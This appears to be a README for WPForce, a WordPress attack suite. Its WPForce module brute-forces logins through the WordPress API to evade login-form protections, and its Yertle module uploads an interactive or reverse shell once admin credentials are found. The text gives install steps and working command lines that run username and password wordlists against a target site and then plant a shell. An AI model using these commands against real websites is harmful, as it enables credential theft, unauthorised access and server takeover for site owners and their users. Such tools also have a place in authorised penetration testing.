WPForce is a suite of WordPress Attack tools. Currently this contains 2 modules – WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found.
* Brute Force via API, not login form bypassing some forms of protection
* Can automatically upload an interactive shell
* Can be used to spawn a full featured reverse shell
+ Python 2.7.x
+ requests python module
git clone https://github.com/n00py/WPForce && cd WPForce
pip install requests bs4
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"
python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i